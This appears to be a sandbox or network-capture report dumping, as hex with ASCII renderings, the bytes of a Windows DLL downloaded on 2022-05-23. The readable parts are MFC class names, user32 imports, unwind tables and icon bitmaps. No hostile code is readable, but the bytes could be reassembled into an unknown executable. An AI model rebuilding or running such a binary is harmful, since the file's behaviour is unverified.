00 00 08 31 01 10 00 00 00 00 2c 31 01 10 00 00 00 00 d4 30 01 10 00 00 00 00 70 30 01 10 00 00 00 00 d8 2a 01 10 00 00 00
                                                                            Data Ascii: N "TN\N0HtmlHelpWhhctrl.ocx :::x8:::d00:9:1,10p0*
                                                                            2022-05-23 16:59:08 UTC352INData Raw: 74 9c 01 10 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 00 00 00 00 40 b2 01 10 00 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 c4 8a 03 10 00 00 00 00 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 00 00 00 00 00 00 00 00 be 01 10 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 00 00 00 00 00 00 00 74 be 01 10 00 00 00 00 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 04 b6 01 10 00 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 34 cb 01 10 00 00 00 00 1f 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00 00 28 cb 01 10 00 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 00 00 00
                                                                            Data Ascii: t@2F3t 4(
                                                                            2022-05-23 16:59:08 UTC360INData Raw: 38 1b 01 10 00 00 00 00 b8 5e 01 10 00 00 00 00 28 ee 00 10 00 00 00 00 10 ec 00 10 00 00 00 00 78 85 01 10 00 00 00 00 50 54 01 10 00 00 00 00 f8 54 01 10 00 00 00 00 98 fd 00 10 00 00 00 00 64 f3 00 10 00 00 00 00 2c 13 01 10 00 00 00 00 d0 ee 00 10 00 00 00 00 00 ef 00 10 00 00 00 00 0c ef 00 10 00 00 00 00 18 ef 00 10 00 00 00 00 4c ef 00 10 00 00 00 00 80 ef 00 10 00 00 00 00 b4 ef 00 10 00 00 00 00 e8 ef 00 10 00 00 00 00 1c f0 00 10 00 00 00 00 50 f0 00 10 00 00 00 00 84 f0 00 10 00 00 00 00 bc f0 00 10 00 00 00 00 f4 f0 00 10 00 00 00 00 04 f1 00 10 00 00 00 00 14 f1 00 10 00 00 00 00 4c f1 00 10 00 00 00 00 84 f1 00 10 00 00 00 00 d8 f1 00 10 00 00 00 00 10 f2 00 10 00 00 00 00 20 f2 00 10 00 00 00 00 58 f2 00 10 00 00 00 00 58 f2 00 10 00 00 00
                                                                            Data Ascii: 8^(xPTTd,LPL XX
                                                                            2022-05-23 16:59:08 UTC368INData Raw: 94 3d 03 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 05 93 19 01 00 00 00 08 7e 06 00 00 00 00 00 00 00 00 00 03 00 00 00 10 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 54 7e 06 00 00 00 00 00 00 00 00 00 03 00 00 00 5c 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 8c 7e 06 00 00 00 00 00 00 00 00 00 05 00 00 00 94 7e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 cc 7e 06 00 00 00 00 00 00 00 00 00 05 00 00 00 d4 7e 06 00 30 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 0a 00 00 00 28 7f 06 00 00 00 00 00 00 00 00 00 63 00 00 00 78 7f 06 00 68 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 10 00 00 00 ac 82 06 00 00 00 00
                                                                            Data Ascii: ="~~ "T~\~ "~~ "~~0"(cxh"
                                                                            2022-05-23 16:59:08 UTC376INData Raw: b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6
                                                                            Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                            2022-05-23 16:59:08 UTC384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e1 06 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b0 0f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 e1 06 00 30 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 48 10 06 00 00 00 00 00 00 00 00 00 58 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 98 e1 06 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 30 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 e1 06 00 a0 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 b8 10 06 00 00 00 00 00 00 00 00 00 d8 10 06 00 f8 37 06 00 a8 37 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: X@0HX@077
                                                                            2022-05-23 16:59:08 UTC392INData Raw: e0 2f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 f8 2f 06 00 00 00 00 00 00 00 00 00 08 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 78 f3 06 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 e0 2f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 f3 06 00 50 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 68 30 06 00 00 00 00 00 00 00 00 00 98 30 06 00 18 3b 06 00 f8 35 06 00 58 36 06 00 a8 37 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 f3 06 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 50 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 f3 06
                                                                            Data Ascii: //0x@/P0h00;5X67@P0
                                                                            2022-05-23 16:59:08 UTC400INData Raw: 35 44 01 00 ff ff ff ff 3c 44 01 00 00 00 00 00 4d 45 01 00 ff ff ff ff 54 45 01 00 00 00 00 00 6f 47 01 00 01 00 00 00 83 47 01 00 02 00 00 00 fe 47 01 00 01 00 00 00 09 48 01 00 00 00 00 00 f7 48 01 00 03 00 00 00 1c 49 01 00 00 00 00 00 1f 4e 01 00 ff ff ff ff 26 4e 01 00 00 00 00 00 5d 4e 01 00 ff ff ff ff 62 4e 01 00 00 00 00 00 f6 4e 01 00 ff ff ff ff fb 4e 01 00 00 00 00 00 12 4f 01 00 ff ff ff ff 19 0a 02 00 0a 32 06 50 e0 9b 03 00 90 72 05 00 19 17 05 00 0e 62 0a c0 08 70 07 60 06 30 00 00 e0 9b 03 00 90 72 05 00 00 00 00 00 01 00 00 00 02 00 00 00 01 00 00 00 94 50 06 00 00 00 00 00 58 e2 06 00 28 00 00 00 b0 52 01 00 38 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 90 52 01 00 ff ff ff ff 00 00 00 00 d0 51 01 00 ff ff ff ff 0e 52 01 00 00 00 00
                                                                            Data Ascii: 5D<DMETEoGGGHHIN&N]NbNNNO2Prbp`0rPX(R8RQR
                                                                            2022-05-23 16:59:08 UTC408INData Raw: 00 00 00 00 40 a7 02 00 01 00 00 00 60 a7 02 00 50 a6 02 00 ff ff ff ff 91 a6 02 00 00 00 00 00 a0 a6 02 00 01 00 00 00 af a6 02 00 02 00 00 00 0e a7 02 00 ff ff ff ff 19 0a 02 00 0a 32 06 50 e0 9b 03 00 48 b7 05 00 19 15 06 00 0c 52 08 d0 06 c0 04 70 03 60 02 30 e0 9b 03 00 48 b7 05 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 44 70 06 00 00 00 00 00 58 e2 06 00 28 00 00 00 5c a8 02 00 38 00 00 00 7c a7 02 00 ff ff ff ff f5 a7 02 00 00 00 00 00 20 a8 02 00 ff ff ff ff 5c a8 02 00 00 00 00 00 69 a8 02 00 01 00 00 00 7c a8 02 00 00 00 00 00 01 0f 03 00 0f 42 0b 70 0a 30 00 00 11 14 03 00 0b 62 07 70 06 30 00 00 e0 9b 03 00 70 b7 05 00 ff ff ff ff 74 a9 02 00 00 00 00 00 94 a9 02 00 01 00 00 00 b4 a9 02 00 14 a9 02 00 ff ff ff ff 37 a9 02 00 02 00 00
                                                                            Data Ascii: @`P2PHRp`0HDpX(\8| \i|Bp0bp0pt7
                                                                            2022-05-23 16:59:08 UTC416INData Raw: 05 54 0b 00 50 df 03 00 e7 df 03 00 e0 8f 06 00 01 1b 07 00 1b 74 0d 00 14 64 0c 00 0f 34 0a 00 04 82 00 00 21 00 00 00 f0 e1 03 00 b2 e2 03 00 18 90 06 00 21 05 02 00 05 54 07 00 f0 e1 03 00 b2 e2 03 00 18 90 06 00 01 13 07 00 13 74 09 00 0e 64 08 00 09 34 06 00 04 42 00 00 01 46 05 00 46 34 08 00 10 74 09 00 04 42 00 00 21 00 00 00 f0 e4 03 00 70 e5 03 00 60 90 06 00 21 05 02 00 05 54 0b 00 f0 e4 03 00 70 e5 03 00 60 90 06 00 01 18 09 00 18 c4 08 00 13 74 0d 00 0e 64 0c 00 09 34 0a 00 04 82 00 00 21 00 00 00 30 e7 03 00 62 e7 03 00 4c 9f 06 00 21 11 04 00 11 74 0b 00 05 34 0a 00 30 e7 03 00 62 e7 03 00 4c 9f 06 00 01 2f 09 00 2f 74 09 00 16 64 08 00 11 54 07 00 0c 34 06 00 04 42 00 00 01 2f 09 00 2f 74 09 00 19 64 08 00 11 54 07 00 0c 34 06 00 04 42 00
                                                                            Data Ascii: TPtd4!!Ttd4BFF4tB!p`!Tp`td4!0bL!t40bL//tdT4B//tdT4B
                                                                            2022-05-23 16:59:08 UTC424INData Raw: 09 34 06 00 04 62 00 00 11 18 09 00 18 c4 07 00 13 74 08 00 0e 64 09 00 09 34 0a 00 04 a2 00 00 30 a3 03 00 01 00 00 00 1e 82 00 00 95 82 00 00 f0 82 00 00 00 00 00 00 21 00 00 00 20 1b 00 00 76 1b 00 00 50 b0 06 00 21 00 00 00 76 1b 00 00 c3 1b 00 00 3c b0 06 00 21 05 02 00 05 64 0c 00 76 1b 00 00 c3 1b 00 00 3c b0 06 00 21 05 02 00 05 d4 07 00 20 1b 00 00 76 1b 00 00 50 b0 06 00 01 25 09 00 25 c4 08 00 16 74 0d 00 0e 54 0b 00 09 34 0a 00 04 82 00 00 21 00 02 00 00 74 09 00 10 12 00 00 1b 12 00 00 20 3d 06 00 21 0a 04 00 0a 74 09 00 05 34 08 00 10 12 00 00 1b 12 00 00 20 3d 06 00 01 13 07 00 13 74 06 00 0e 54 07 00 09 34 08 00 04 82 00 00 11 22 0e 00 22 e4 0b 00 1e d4 0c 00 1a c4 0d 00 16 74 0e 00 12 64 0f 00 0e 34 10 00 0a 01 11 00 30 a3 03 00 01 00 00
                                                                            Data Ascii: 4btd40! vP!v<!dv<! vP%%tT4!t =!t4 =tT4""td40
                                                                            2022-05-23 16:59:08 UTC432INData Raw: 78 74 57 00 be 00 44 72 61 77 54 65 78 74 45 78 57 00 82 01 47 72 61 79 53 74 72 69 6e 67 57 00 34 02 53 63 72 65 65 6e 54 6f 43 6c 69 65 6e 74 00 00 40 00 43 6c 69 65 6e 74 54 6f 53 63 72 65 65 6e 00 00 6e 01 47 65 74 57 69 6e 64 6f 77 44 43 00 0d 00 42 65 67 69 6e 50 61 69 6e 74 00 00 c8 00 45 6e 64 50 61 69 6e 74 00 00 6c 01 47 65 74 57 69 6e 64 6f 77 00 5f 01 47 65 74 53 79 73 74 65 6d 4d 65 74 72 69 63 73 00 00 78 01 47 65 74 57 69 6e 64 6f 77 52 65 63 74 00 77 01 47 65 74 57 69 6e 64 6f 77 50 6c 61 63 65 6d 65 6e 74 00 00 a0 02 53 79 73 74 65 6d 50 61 72 61 6d 65 74 65 72 73 49 6e 66 6f 41 00 95 01 49 6e 74 65 72 73 65 63 74 52 65 63 74 00 f8 01 4f 66 66 73 65 74 52 65 63 74 00 00 8a 02 53 65 74 57 69 6e 64 6f 77 50 6f 73 00 00 88 02 53 65 74 57 69
                                                                            Data Ascii: xtWDrawTextExWGrayStringW4ScreenToClient@ClientToScreennGetWindowDCBeginPaintEndPaintlGetWindow_GetSystemMetricsxGetWindowRectwGetWindowPlacementSystemParametersInfoAIntersectRectOffsetRectSetWindowPosSetWi
                                                                            2022-05-23 16:59:08 UTC440INData Raw: 64 6c 65 4d 61 70 40 40 00 00 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 46 6f 6e 74 40 40 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 43 68 65 76 72 6f 6e 4f 77 6e 65 72 44 72 61 77 4d 65 6e 75 40 40 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 44 6f 63 6b 43 6f 6e 74 65 78 74 40 40 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 50 74 72 41 72 72 61 79 40 40 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 54 6f 6f 6c 54 69 70 43 74 72 6c 40 40 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 41 72 63 68 69 76 65 45 78 63 65 70 74 69 6f 6e 40 40 00 60 d7 05 10 00 00 00
                                                                            Data Ascii: dleMap@@`.?AVCFont@@`.?AVCChevronOwnerDrawMenu@@`.?AVCDockContext@@`.?AVCPtrArray@@`.?AVCToolTipCtrl@@`.?AVCArchiveException@@`
                                                                            2022-05-23 16:59:08 UTC448INData Raw: 2e 3f 41 56 43 44 6f 63 75 6d 65 6e 74 40 40 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 52 6f 77 4c 69 73 74 44 6f 63 40 40 00 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 52 6f 77 4c 69 73 74 56 69 65 77 40 40 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 44 69 61 6c 6f 67 40 40 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 41 62 6f 75 74 44 6c 67 40 40 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 57 69 6e 54 68 72 65 61 64 40 40 00 00 00 00 00 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 57 69 6e 41 70 70 40 40 00 00 00 60 d7 05 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 3f 41 56 43 52 6f
                                                                            Data Ascii: .?AVCDocument@@`.?AVCRowListDoc@@`.?AVCRowListView@@`.?AVCDialog@@`.?AVCAboutDlg@@`.?AVCWinThread@@`.?AVCWinApp@@`.?AVCRo
                                                                            2022-05-23 16:59:08 UTC456INData Raw: 44 8d 01 00 a4 67 06 00 44 8d 01 00 b4 8d 01 00 80 56 06 00 b4 8d 01 00 e0 8d 01 00 18 7d 06 00 e0 8d 01 00 d0 8e 01 00 14 56 06 00 d0 8e 01 00 e8 8e 01 00 e4 95 06 00 e8 8e 01 00 5d 8f 01 00 58 77 06 00 60 8f 01 00 c0 8f 01 00 b8 76 06 00 c0 8f 01 00 09 90 01 00 18 7d 06 00 0c 90 01 00 6d 91 01 00 78 59 06 00 70 91 01 00 bd 91 01 00 cc 40 06 00 c0 91 01 00 79 94 01 00 44 56 06 00 7c 94 01 00 42 95 01 00 9c 68 06 00 44 95 01 00 39 96 01 00 e0 73 06 00 3c 96 01 00 8f 98 01 00 5c 56 06 00 90 98 01 00 c5 99 01 00 58 77 06 00 c8 99 01 00 c4 9a 01 00 d4 55 06 00 d8 9a 01 00 1d 9b 01 00 18 7d 06 00 20 9b 01 00 3d 9b 01 00 4c 9f 06 00 6c 9b 01 00 e9 9b 01 00 cc 40 06 00 18 9c 01 00 38 9c 01 00 20 3d 06 00 38 9c 01 00 71 9c 01 00 74 4e 06 00 7c 9c 01 00 ac 9c 01
                                                                            Data Ascii: DgDV}V]Xw`v}mxYp@yDV|BhD9s<\VXwU} =Ll@8 =8qtN|
                                                                            2022-05-23 16:59:08 UTC464INData Raw: e0 0f 03 00 86 11 03 00 c0 79 06 00 88 11 03 00 ad 12 03 00 d8 79 06 00 b0 12 03 00 86 14 03 00 20 7d 06 00 88 14 03 00 9b 15 03 00 e4 79 06 00 a8 15 03 00 ce 15 03 00 e4 95 06 00 d0 15 03 00 e3 16 03 00 14 7a 06 00 f0 16 03 00 16 17 03 00 e4 95 06 00 18 17 03 00 7e 17 03 00 44 7a 06 00 4c 1a 03 00 a3 1b 03 00 58 7a 06 00 ac 1b 03 00 c4 1b 03 00 e4 95 06 00 cc 1b 03 00 e4 1b 03 00 e4 95 06 00 e4 1b 03 00 3a 1c 03 00 a8 7a 06 00 44 1c 03 00 5c 1c 03 00 e4 95 06 00 5c 1c 03 00 7f 1c 03 00 20 3d 06 00 80 1c 03 00 6d 1e 03 00 6c 58 06 00 70 1e 03 00 47 1f 03 00 dc 7a 06 00 50 1f 03 00 68 1f 03 00 e4 95 06 00 68 1f 03 00 86 1f 03 00 14 7b 06 00 88 1f 03 00 a1 20 03 00 1c 7b 06 00 a4 20 03 00 23 21 03 00 24 7b 06 00 24 21 03 00 b2 21 03 00 d4 55 06 00 b4 21 03
                                                                            Data Ascii: yy }yz~DzLXz:zD\\ =mlXpGzPhh{ { #!${$!!U!
                                                                            2022-05-23 16:59:08 UTC472INData Raw: 20 3d 06 00 18 36 05 00 66 36 05 00 20 3d 06 00 74 36 05 00 90 36 05 00 20 3d 06 00 90 36 05 00 1f 37 05 00 20 3d 06 00 20 37 05 00 b3 37 05 00 20 3d 06 00 b4 37 05 00 47 38 05 00 20 3d 06 00 48 38 05 00 db 38 05 00 20 3d 06 00 00 39 05 00 58 39 05 00 20 3d 06 00 58 39 05 00 78 39 05 00 20 3d 06 00 90 39 05 00 b0 39 05 00 20 3d 06 00 b0 39 05 00 2b 3a 05 00 20 3d 06 00 f8 3a 05 00 44 3b 05 00 20 3d 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: =6f6 =t66 =67 = 77 =7G8 =H88 =9X9 =X9x9 =99 =9+: =:D; =
                                                                            2022-05-23 16:59:08 UTC480INData Raw: 02 40 02 40 01 40 02 80 00 c0 03 00 00 3f fc 00 00 20 04 00 00 10 08 00 00 08 10 00 00 04 20 00 00 02 40 00 00 01 80 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff fe 7f ff ff fc 3f ff ff f8 1f ff ff f0 0f ff ff e0 07 ff ff c0 03 ff ff c0 03 ff ff 3f fc ff fe 3f fc 7f fc 3f fc 3f f8 3e 7c 1f f0 3c 3c 0f e0 38 1c 07 e0 38 1c 07 f0 3c 3c 0f f8 3e 7c 1f fc 3f fc 3f fe 3f fc 7f ff 3f fc ff ff c0 03 ff ff c0 03 ff ff e0 07 ff ff f0 0f ff ff f8 1f ff ff fc 3f ff ff fe 7f ff ff ff ff ff ff ff ff ff ff ff ff ff 10 00 0f 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: @@@? @?????>|<<88<<>|?????( @
                                                                            2022-05-23 16:59:08 UTC488INData Raw: ff ff f8 87 77 87 77 77 80 00 00 00 8f ff ff ff ff 88 ff 00 0f ff f8 87 78 88 77 77 80 00 00 00 8f ff ff ff ff 88 f0 00 00 ff f8 87 88 88 87 77 80 00 00 00 8f ff ff ff ff 88 f0 0f 00 0f f8 87 88 78 88 77 80 00 00 00 8f ff ff ff ff 88 f0 ff f0 00 f8 87 87 77 88 87 80 00 00 00 8f ff ff ff ff 88 ff ff ff 00 f8 87 77 77 78 87 80 00 00 00 8f ff ff ff ff 88 ff ff ff f0 f8 87 77 77 77 87 80 00 00 00 8f ff ff ff ff 88 ff ff ff ff f8 87 77 77 77 77 80 00 00 00 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 88 80 00 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 20 00 00 00 00 00 00 00 01 00 95 58 00 00 95 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: wwwxwwwxwwwwxwwwwwww( XX
                                                                            2022-05-23 16:59:08 UTC496INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 3b 3b 3b 00 33 33 33 00 32 32 32 00 40 40 40 04 54 54 54 00 4d 4d 4d 22 4d 4d 4d de 4d 4d 4d ff 4d 4d 4d fc 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d ff 4d 4d 4d fc 4d 4d 4d ff 4d 4d 4d b0 4d 4d 4d 00 4d 4d 4d 03 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: ;;;333222@@@TTTMMM"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
                                                                            2022-05-23 16:59:08 UTC504INData Raw: 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db fe 4b 1c df fc 49 1c c9 ff 47 1d ae 5f 46 1e a2 00 47 1d b0 04 45 1e a4 00 47 1e af 00 4d 4d 4d 02 4d 4d 4d 00 4d 4d 4d 26 4d 4d 4d ae 4d 4d 4d ad 4d 4d 4d 23 4d 4d 4d 00 4d 4d 4d 02 4d 4d 4d 00 4c 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: KKKKKKKKKKKKKKKKKKKIG_FGEGMMMMMMMMM&MMMMMMMMM#MMMMMMMMMLLL
                                                                            2022-05-23 16:59:08 UTC512INData Raw: ee ee ee ff e5 e5 e5 ff 8b 8b 8b ff 6f 6f 6f ff ba ba ba ff f6 f6 f6 ff ea ea ea ff ec ec ec ff ec ec ec ff ee ee ee ff e1 e0 e2 ff ce d0 c9 ff bc b6 d0 ff 4e 20 dc ff 4a 1b dc ff 4b 1d dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c db ff 4b 1c df ff 4a 1c cd ff 47 1d ad fb 47 1d b0 ff 47 1d b4 8f 47 1d af 00 4a 36 7d 07 4d 4d 4d 00 4d 4d 4d 84 4d 4d 4d ff 4d 4d 4d f7 4d 4d 4d ff 4d 4d 4d 7e 4d 4d 4d 00 4d 4d 4d 04 4d 4d 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: oooN JKKKKKKKKKKKJGGGGJ6}MMMMMMMMMMMMMMMMMM~MMMMMMMMM
                                                                            2022-05-23 16:59:08 UTC520INData Raw: ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff ec ec ec ff eb eb eb ff ec ec ec ff f0 f0 f0 ff eb eb eb ff eb eb eb ff ec ec ec ff ec ec ec ff d2 d2 d2 ff cb cb cb ff cb cb cc ff d1 d3 cb ff b4 ab d0 ff 4a 1b dd ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dc ff 4b 1c dd ff 4b 1c d8 ff 47 1d b2 ff 47 1d af ff 47 1d b0 fc 47 1d b0 ff 48 1d b5 57 47 1d b2 00 47 1d b2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: JKKKKKKKKKKGGGGHWGG
                                                                            2022-05-23 16:59:08 UTC528INData Raw: e3 e3 e3 ff d1 d1 d1 ff ca ca ca ff cc cc cc ff cc cc cc ff ca ca ca ff d7 d7 d7 ff 8a 89 8d ff 2e 32 24 ff 3e 36 58 ff 4e 21 d8 ff 4d 1c e2 ff 4c 1e db ff 48 18 db ff 59 2c e2 ff 7c 53 f1 ff 7a 51 f0 ff 79 50 f0 ff 7e 55 f2 ff 66 3a e8 ff 48 19 da ff 4c 1d df ff 4a 1c cd ff 47 1d ad ff 47 1d b1 ff 47 1d b0 ff 47 1d b0 fd 47 1d b0 ff 47 1d b2 c5 3a 21 00 00 41 1e 61 00 45 23 c0 00 07 ba ff 00 11 a3 fc 00 11 a3 fc 03 12 a2 fb 00 12 a3 fb 00 12 a2 fb 00 02 8d e1 00 03 8e e2 00 03 8e e1 01 04 90 e5 02 03 8e e2 00 03 8e e2 00 07 96 eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: .2$>6XN!MLHY,|SzQyP~Uf:HLJGGGGGG:!AaE#
